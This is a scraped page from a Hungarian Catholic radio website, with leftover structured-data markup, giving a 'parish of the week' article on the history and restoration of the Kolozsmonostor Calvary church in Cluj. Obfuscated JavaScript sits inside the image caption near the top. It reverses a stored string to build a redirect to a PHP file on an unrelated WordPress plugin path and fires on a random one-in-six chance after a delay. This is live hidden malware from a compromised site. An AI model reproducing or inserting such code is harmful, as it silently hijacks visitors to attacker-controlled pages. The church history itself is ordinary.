tor_0.jpg","contentUrl":"http://www.mariaradio.ro/wp-content/uploads/2014/12/kolozsmonostor_0.jpg","width":1024,"height":524,"caption":"kolozsmonostor.jpg"},{"@type":"WebPage","@id":"http://www.mariaradio.ro/2014/12/12/a-het-plebaniaja-kolozsmonostor/#webpage","url":"http://www.mariaradio.ro/2014/12/12/a-het-plebaniaja-kolozsmonostor/","name":"A h\u00e9t pl\u00e9b\u00e1ni\u00e1ja: KOLOZSMONOSTOR - M\u00e1ria R\u00e1di\u00f3 Erd\u00e9ly","isPartOf":{"@id":"http://www.mariaradio.ro/#website"},"primaryImageOfPage":{"@id":"http://www.mariaradio.ro/2014/12/12/a-het-plebaniaja-kolozsmonostor/#primaryimage"},"datePublished":"2014-12-12T10:49:49+00:00","dateModified":"2022-08-13T07:40:40+00:00","author":{"@id":"http://www.mariaradio.ro/#/schema/person/82c94139568830b97ee300374f97f3f7"},"breadcrumb":{"@id":"http://www.mariaradio.ro/2014/12/12/a-het-plebaniaja-kolozsmonostor/#breadcrumb"},"inLanguage":"hu","potentialAction":[{"@type":"ReadAction","target":["http://www.mariaradio.ro/2014/12/12/a-het-plebaniaja-kolozsmonostor/"]}]},{"@type":"BreadcrumbList","@id":"http://www.mariaradio.ro/2014/12/12/a-het-plebaniaja-kolozsmonostor/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"http://www.mariaradio.ro/"},{"@type":"ListItem","position":2,"name":"A h\u00e9t pl\u00e9b\u00e1ni\u00e1ja: KOLOZSMONOSTOR"}]},{"@type":"Person","@id":"http://www.mariaradio.ro/#/schema/person/82c94139568830b97ee300374f97f3f7","name":"maradmin","image":{"@type":"ImageObject","@id":"http://www.mariaradio.ro/#personlogo","inLanguage":"hu","url":"http://2.gravatar.com/avatar/590fd49f4d8e5b826516999e077dc4d7?s=96&d=mm&r=g","contentUrl":"http://2.gravatar.com/avatar/590fd49f4d8e5b826516999e077dc4d7?s=96&d=mm&r=g","caption":"maradmin"},"url":"http://www.mariaradio.ro/author/maradmin/"}]}

A hét plébániája: KOLOZSMONOSTOR

kolozsmonos$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor.jpg

Kolozsmonostor egykor önálló település volt, Kolozsvár város nyugati részével határos, 1895-ben csatolták a városhoz.  Kolozsmonostoron a XI. században, I.Béla király (1061-1063) alapította a Benedek-rendi apátságot, amelytől a település neve is származik. A bencés apátság Erdélyben a gyulafehérvári  püspökség mellett a katolikus egyház egyik legkorábbi és legjelentősebb intézménye volt. Az 1241-es tatárjáráskor elpusztul, IV. Béla király (1206-1270) „a második honalapító” újraalapítja, 1285-ben újra a tatárok pusztítják. A XIV. században jelentős hiteles hellyé vált, első elismert oklevele 1308-ból való. A XV. század második felében erődítmény épült a kolostor védelmére, a reformáció után, a bencés rend megszüntével a kolostor világi kézre kerül. Báthory István (1533-1586) erdélyi fejedelem az apátságot 1579-ben a jezsuitáknak adományozza, templomát helyreállítatva, ugyanakkor az apátság elhagyott épületében megalapítja a kolozsmonostori jezsuita iskolát, amelyet 1581-ben a kolozsvári Farkas utcába költöztet, ennek a jogutóda a piarista gimnázium (1776 és 1948 között).  Rudnay Sándor (1760-1831) erdélyi püspök engedélyével, az 1658-1661 évi török-tatár dúláskor valamint a kuruc háborúk miatt, a végleg elpusztult kolozsmonostori apátsági templom köveinek felhasználásával épült fel (1817-1821) az iskola új empire stílusú, Királyi Líceum épülete, amelyben utódja, a mostani Báthory István Elméleti Líceum működik.

Az apátsági templomból csak a gótikus szentély maradt meg, amit kápolnává alakítanak át. Az Erdélyi Római Katolikus Státus 1896-ban újjáépíttette a hajórészt, négyszög alakúra, neogótikus stílusban, megemelve a szentély falait is. A templom nyugati díszes kapuját Bertha Mihály neves kolozsvári kőfaragó készítette (másolata az eredeti főkapunak, amely a Kolozsvári Történelmi Múzeumban van), a kapu fölött a templom védőszentje,  karjaiban a kis Jézust tartó Szűz Mária kőszobra áll. Így a  templom, csak szerény maradványa lett az egykori apátságnak, amelynek háromhajós impozáns temploma volt.

1925-ben bérbe adták 25 évi használatra a görög katolikus egyháznak, a kommunizmus alatt ortodoxok használták, majd hosszas tárgyalások után, 1994. június 20-án került vissza jogos tulajdonosához, a római katolikus egyházhoz. 1996–1997 között volt a műemlék-templom általános felújítása, Székely Lázár és csapata hozzáértő munkájával, a restaurálásért a templom 1998-ban Európa Nostra díjat kapott. A megújult templom- belső, Egri László és fia István által készített 11 új vitrál ablakkal gazdagodott, Korondi Jenő (1935-2007) jeles erdélyi szobrászművész tervei alapján öntött, 14 keresztúti stáció bronz domborművel (2008), valamint a szentélyben a szászdályai evangélikus templomból idehozott 222 éves műemlék orgonával.

A templomot 1997. június 20-án Dr.Jakubinyi György gyulafehérvári érsek szentelte újra, az egykori patrocíniuma, Nagyboldogasszony tiszteletére. Az egykori középkori földvár helyén, a Kálvária-domb magaslatán álló műemlék templomhoz vezető sétányon, bal oldalt Kós Károly (1883-1977) neves építész, író által tervezett harangláb áll (1922), jobb oldalon a klasszicista stílusú kis kápolna (épült 1831, átépítve 1970), omlásveszély miatt elkezdték felújítását. A templomtól délre XIX. századi sírok sorakoznak, észak-keletre még látszanak a hajdani erődítmény romjai.

A kolozsmonostori  Nagyboldogasszony Kálvária-templom, a Gyulafehérvári Római Katolikus Főegyházmegye  Kolozs-dobokai főesperesi kerület, Kolozsvár-monostori Fájdalmas Szűzanya  plébániájához tartozik,  Kádár István id., címzetes esperes a plébánosa.

Összeállította: Szebeni Lajos.

Fotó: www.panoramio.com

About the author

maradmin

Leave a Comment